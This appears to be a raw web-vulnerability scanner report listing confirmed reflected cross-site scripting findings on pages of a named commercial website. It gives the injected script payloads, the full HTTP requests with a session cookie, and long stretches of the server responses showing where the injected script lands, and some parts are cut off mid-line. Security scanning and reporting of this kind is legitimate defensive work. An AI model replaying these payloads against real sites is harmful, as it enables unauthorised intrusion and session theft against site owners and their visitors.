value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog2
0100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content" style="padding:8px 0 5px 8px;"> <iframe frameborder="0" height="280" width="285" name="voip_form" src="/voip_services/form1-sm.php" scrolling="no"></iframe> </div> </div> </div> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div 
id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-bl..
- /web_hosting/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000387)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000387)%3C/script%3E

/web_hosting/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000387)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000387)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/web_hosting/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000387)</script>

Request

GET /web_hosting/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000387)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/web_hosting/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:59:26 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 8443
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", web hosts, web hosting, best web host, web hosting reviews, web hosting ratings, webhosting, domain registration, domain name registration, HostGator, Hostmonster, Yahoo! Small Business, Myhosting.com, Lunarpages, 1&1 Web Hosting, BlueHost, iPage, FatCow, Just Host, Dreamhost, Web Hosting Pad, HostPapa, IX Web Hosting, InMotion Web Hosting, Register.com, Intuit Web Hosting, GoDaddy" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/web_hosting/'"--></style></script><script>netsparker(0x000387)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" 
alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option 
value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000387)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a><span class="nav_border">|</span> <a href="reportcard.php">Report Card</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script 
type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/web_hosting_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Web Hosting FAQ</h1> <p>Frequently Asked Questions about Web Hosting</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Web 
Hosting:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="web_hosting"> <input type="hidden" name="FieldData4" 
value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog2
0100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a 
..
- /credit_report_monitoring/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00039A)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00039A)%3C/script%3E

/credit_report_monitoring/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00039A)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00039A)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/credit_report_monitoring/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ene..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x00039A)</script>

Request

GET /credit_report_monitoring/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00039A)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/credit_report_monitoring/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:59:33 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6651
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", credit report, free credit report, free credit score, fico score, credit report monitoring, credit monitoring, credit scores, credit scoring, credit services, FICO, Identity Guard, Trusted ID, Equifax Complete, ProtectMyID.com, CreditCheck Total, FreeCreditScore.com, True Credit 3-Bureau" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/credit_report_monitoring/'"--></style></script><script>netsparker(0x00039A)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p 
class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option 
value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x00039A)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() 
{ hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/credit_report_monitoring_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Credit Report Monitoring FAQ</h1> <p>Frequently Asked Questions about Credit Report Monitoring</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Credit Report Monitoring:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" 
name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="credit_report_monitoring"> <input type="hidden" name="FieldData4" 
value=".."> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=..
- /aboutus.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003B9)%3C/script%3E

/aboutus.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003B9)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/aboutus.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003B9)%..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0003B9)</script>

Request

GET /aboutus.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003B9)%3C/script%3E HTTP/1.1
Referer: http://www.nextadvisor.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:59:43 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3544
Content-Type: text/html


